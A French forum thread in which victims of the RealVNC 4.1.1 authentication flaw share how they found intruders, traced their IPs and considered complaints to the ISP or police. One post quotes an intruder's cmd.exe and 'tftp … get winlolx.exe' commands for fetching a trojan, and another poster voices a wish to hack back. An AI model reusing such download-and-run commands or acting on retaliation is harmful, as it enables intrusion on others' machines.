Reprise du message précédent :
Mouhahahahahahahhahaa trop fort
et effectivement c'est revenu. Tu viens de le ridiculiser mechament la.
En meme temps, c'est tellement enorme qu'on peut se demander si ce compte free a pas été hacké quand meme mais bon...
LOL.

Bin écoute, il a l'air de trainer sur beaucoup de chans orientés scripts, donc la coïncidence bofbof...

ouai...

 
Un site sur mirc et ton pirate tente d'installer mirc ?
Un site Free et une IP free sur cachan ?
 
Ca fait de sacrées coincidences !
 
maintenant recoupe ce soir avec tes logs vnc ...

Tu pourrais m'envoyer en MP l'IP contenue dans le script ? Ca peut me servir pour les recoupages !
 

tu la trouveras dans l'archive, fichier var.ini
 
Y'a d'autres infos mais ne connaissant pas du tout le chat IRC et mirc, je te laisse te renseigner.

L'ip 82.xx.xx.xx n'appartient pas au hacker (ou alors il est vraiment grave   ), c'est plutot un serveur hacké sur lequel il y a un serveur irc pirate (certainement installé à l'insu de proprio).
J'y connais pas grd chose en IRC non plus mais j'ai l'impression que le mec essayait d'installer un bot irc sur ta machine surement pour faire du xdcc, également son paquet contenait un scanner de port configuré pour scanner uniquement sur le 5900 (donc pour trouver d'autres serveurs VNC).  
 
Un moyen simple pour ne plus te faire avoir c'est de changer le port d'ecoute de VNC, on voit clairement que son scanner ne recherche que sur ce port là
 
D'autre part, tu peux aller sur son channel irc, y'a toutes les infos de connetion dans le fichier var.ini (destiné normalement a la connection du bot).
 
Apparemment y'a rien de méchant dans son package, pas de backdoor, pas de rootkit donc si tu résouds ton prob vnc, il pourra pas revenir
 
Sinon ne t'inquiete pas, le brute force sur VNC c'est presque impossible. Tout ce qui est possible c'est d'extraire la clé du registre qui contient l'hexa du pass et de le décrypter mais pour ca il faut deja avoir un accès root sur la machine.  

Merci pour toutes ces précisions.
 
Je viens de vérifier ma version qui est bien la 4.1.1. Nous avons notre réponse !
 
Reste à attendre que le sieur se connecte à MSN pour lui expliquer ma vision des choses.
 
Un grand merci à tous pour la solution de ce problème en une journée !
 
Je vous tiens au courant de cet entretien qui risque d'être fort drole  

Ils ont pas assuré sur ce coup là chez VNC , sortir une version avec une telle faille de sécurité

Bon, des news du journal d'évenement.
 
Effectivement, un paquet de déco / reco sur VNC, à des heures où je ne m'en suit jamais servi. L'antivirus ne trouve rien, j'en déduis que c'était la première intrusion du gars. Si vous voyez d'autres choses à controller sur mon poste, n'hésitez pas à me conseiller.

ben voui : c'est quoi l'ip qui s'est connectée ? La même que celle dont je t'ai causée ?

 
 
tu as pas l'ip du gars ?    
 
Verifie dans les process que son restore.exe ne soit pas lancé.  

Oui, j'ai l'IP du gars    
 
Chez Free, comme prévu. Et il est bien sur Cachan.
 
Par contre, son IP renvoie sur un site de stats de salon IRC dont je tairais le nom.
 
Restore n'est pas lancé, il n'avait pas eu le temps d'executer son script de toute manière.

je trouve qd meme etonnant qu'un type capable d'exploiter la "faille VNC", se fasse avoir avec son IP.
 
A mon avis le site web en question a été piraté et sert maintenant pour le download de saloperie.
(J'en ai fait l'amère expérience en novembre dernier avec la faille sur awstat.......)
 

D'un autre coté, si je l'avais pas choppé pile pendant la manip', il aurait peut être effacé les traces de son passage.
 
Et rien ne me dit que c'est son IP, même si j'ai de fortes présomptions.

Une machine avec un serveur http dessus , je pense que c'est la sienne , peu de chances que ce soit un zombie

pas une zombie, juste une machine hackée sur laquel le "pirate en herbe" a déposé un fichier qu'il s'amuse ensuite à downloader à partir des clients VNC qu'il hack.
 
=> on remonte vite à au serveur web, mais pas possible de remonter facilement au hackeur....

tu devrais te connecter au serveur IRC, entrer sur le channel ciblé dans le ini et discuter avec un admin du serveur IRC. J'y suis là sur le channel, y'a un admin et plusieurs bots, surement des machines hackées aussi  
 
Je viens de discuter avec l'admin du serveur, (il etait lui meme infecté comme quoi...). Sinon il a fermé le channel et a viré tous les bots. Apparement le "hacker" a deja filé, il etait pas sur le channel.

Bon, bin je viens de finir avec lui.
 
Comme je supposais, rien de constructif. Je débute poliement en lui demandant si il est pas venu faire un tour chez moi hier soir. Points de suspention, il me demande comment je sais que c'est lui.
là, j'avoue que je lui ai dis qu'il avait pas été très discret, et je lui demande gentiment de m'oublier. Il m'envoi chier, je lui poste les infos (IP et urls). "C'est bien, tu va faire quoi, tu va appeller la police ?" et il se déco.
 
C'est beau la jeunesse. Je garde tout sous le coude, si j'ai des soucis par la suite, il prendra pour les autres dans le doute.
 
Quand même minable d'en arriver là...

J'ai une question :
 
ou as-tu un log des connections avec RealVNC ? J'ai ressorti ce prog des oubliettes mais je n'ai trouvé nul part un quelconque enregistrement des connexions ou tentatives
 
Sinon :
 
tu serais effectivement en droit de porter plainte. Il a commis un délit.

Les logs sont pas dans VNC, mais on voit les connexions par le journal d'évenement Windows.

??
pourtant j'ai regardé ! je remate ...

 
Si il a besoin des infos sur le gars en question, qu'il me PM. La gars a confirmé que c'était lui (avant de m'envoyer bouler   ).

 
 
ok effectivement SI le serveur est lancé en tant que service ...

Bon, cette histoire (et la conversation) m'ont pas mal énervé.
 
Je suis pas trop pour la dénonciation, mais j'aimerai garder une porte de secours si il recommence.
 
Que me conseillez vous, sachant que je vois d'ici l'intéret (nul) que portera Free à mon égard si je ne veut pas porter plainte.
 
Je me dis que si je me réveille dans 1 mois, Free ne pourra plus prouver la fraude (ils gardent pas leurs log 107 ans j'imagine).

Ben tu fais comme tu veux.
 
Le gars il essaye d'entrer chez toi et pris sur le fait il t'envoie chier alors si tu veux tendre la fesse gauche
 
En deça de la plainte auprès de la police (qui est effectivement un peu fort ), tu peux contacter son FAI pour signaler qu'il s'est connecté à ton ordi après l'utilisation d'un exploit. I devrait lui notifier par mail qu'à la prochaine plainte, il verra son abonnement résilié.

Ca me paraît être la meilleure solution.
 
Porter plainte pour un truc comme ça où au final, il n'y a pas de dommages (enfin j'espère), je pense que ça ne donnera pas grand chose.
Par contre, en effet, s'ils sont un minimum sérieux chez Free (surtout que LeRiton est client aussi), ils devraient balancer un avertissement à ce type.

Oui moi je me plaindrais a Free pour qu'il ait un avertissement. Il joue au con, il aurait au moins pu s'excuser.
 
Sinon LeRiton je te file en pm les coordonnées de l'admin du serveur IRC.

 
 
Les FAI ne gardent aucun log des activités de leurs clients sur internet , uniquement les heures de connexions et les ips attribuées (en ip fixe c'est pas compliqué) , si tu veux (essayer de) faire valloir tes droits à ne pas te faire hacker , tu dois écrire un mail explicite accompagné de preuves (logs) au service abuse du FAI du hacker . Vu que c'est un client de Free , l'adresse du service est  abuse@proxad.net si je me trompe pas .

Quel petit con ! Je suppose que tu a logué la conversation que tu as eu avec lui, donc si il a reconu que c'etait bien lui, niveau preuve (en plus de tout le reste) ca le fait pas mal. Donc perso je sais que vu sa reaction je ferai la totale, plainet au FAI plus depot d'une plainte au poste de police, on a pas le droit d'etre aussi con.

Bon, pour clore le sujet, pas de plainte pour le moment, je verrais demain pour Free.
 
Merci à tous ceux qui m'ont aidé à résoudre le problème si rapidement, je pense que du même coup, il a eu une belle frayeur (encore dans le doute même) et qu'il hésitera avant de recommencer.
 
Merci à tous !

Bonsoir,
 
Idem pour moi. J'étais tranquille devant mon PC quand la souris c'est mise à bouger...
Direct un oeil sur VNC et l'icone était actif.
 
Donc un petit netstat pour voir les connexions sur ma machine puis après un petit tour dans les logs et là.........grosse stupeur.
J'ai des centaines de connexions réussis à VNC
 
Je n'ose pas imaginer l'état de mon PC :| certaines connexions ont 2 mois
 
Je vais contacter le provider du dernier avec preuve à l'appuie (screenshot et logs)
 
Mais VNC fini pour moi. Welcome SSH.

 
Même problème sur le PC du taf et chez ma copine

Bonsoir, un ami vous demande :
 
 
Bonsoir,
 
Même problème sur les 2 ordis de mes grands parents, execution (téléchargement plutot) de fichiers sur le même site, mais cette fois c'était "slss.exe"...
 
Suis arrivé à temps (vive mles grands parents qui m'appellent à c emoment là ^^), tout coupé à distance, et je viens de mailer abuse@proxad.net pour ce problème.
 
A mon avis c'est bien le détenteur de ce compte, ça fait trop de coïncidence
 
VNC mis à jour à la 4.12, je vais m'occuper du cas de ce mec... vais porter plainte contre son IP, violation de propriété privée (même si c'est qu'un ordi) + atteinte à ala vie privée en balançant des injures sur le MSN...
 
Si vous organisez une action commune, pouvez-vous me contacter via msn pour m'en informer : usarmy_canard_wc[at]msn.com
 
Merci

Bonsoir, je suis la personne qui a fait poster le précédent message
 
J'ai tracé l'IP dans l'event viewer de windaube, et suis tombé sur un NRA à REIMS, donc pas de cachan cette fois. (IP : 86.208.199.XX chez Wanadoo)
 
Après contact sur MSn de ce "Mengde", il en ressort que c'est un petit couillon qui s'amuse et se croit malin, tout ce que j'ai pu en tirer c'était du "j'en ai rien à foutre" (en résumant)...
 

Je repasse par là.
 
J'avais eu le même son de cloche à l'époque. Plus de nouvelles après, je suis passé à autre chose...

Salut,
 
Le même problème chez trois client différents : Paris, Lyon et Chassieu

Tu peux choper l'adresse du gars dans les logs de Windows il me semble, un collegue à eu se problème et il me semblait bien que l'adresse était indiqué.
 
Ce qui est sur est que tu as des traces dans les logs Windows

je découvre cette faille ...
drapal

Bonjour,
Même aventure mais avec un autre mode opératoire:
il exécute dos via la commande %systemroot%\system32\cmd.exe
(J’ai appris un raccourci là) lol
ensuite il tape tftp -i 0.0.0.0 get winlolx.exe
 
Comme c'est la 3 ème fois j'ai pris le temps de regarder mais quand j'ai vu que c'était via VNC (icone verdi) je lui ai coupé la chique, j'ai craqué, pourtant ma machine ne craint rien et je formaterai quand j'aurais compris comment tout cela marche.  
 
Apres ma première attaque (sans savoir si VNC était en cause) j'avais tout scané et trouvé 2 trojan + un icon avec un programme appelé ddos.exe
Par la suite je coupais tous les services apres lancement (VNC, Filezilla serveur etc...)
Je n'ai donc pas eu de souci sauf hier et sans VNC j'en suis sur et trois fois aujourd'hui juste apres mon scan total.
 
Le mode opératoire est le même : exécute : %systemroot%\system32\cmd.exe puis lancement d'un exe précédé de tftp (tentative avec 2 winlolx.exe et un autre dont je n'ai pu noter le nom)
 
Tout cela est incohérent comment peut il avec ou sans VNC? Est-ce le nouveau contact mystère dans MSN d'hier mais qui ne répond pas? Est-ce un hack via msn ?
Je sais simplement que winlolx.exe = Malware.Trojan.Backdoor.Gen Spyware
Que mon ad aware ne l'a pas vu et que je devrai utiliser Ewido comme anti Spyware et Anti Malware. (merci Steve)
 
 
Ma question donc n'est pas comment nettoyer ma machine, mais comprendre comment il a fait, trouver son ip, tenter la même chose, VANGEANCE!. Et puis je ne vais pas formater mon disque et refaire les mêmes erreurs.
 
Bon je dois pas beaucoup aider, et exposer un nouveau problème, mais Leriton voulait savoir s'il était seul dans se cas.... ben non....
 
@+ merci à tous
Humanum

 
 
comment et ou son les log?
merci d'avance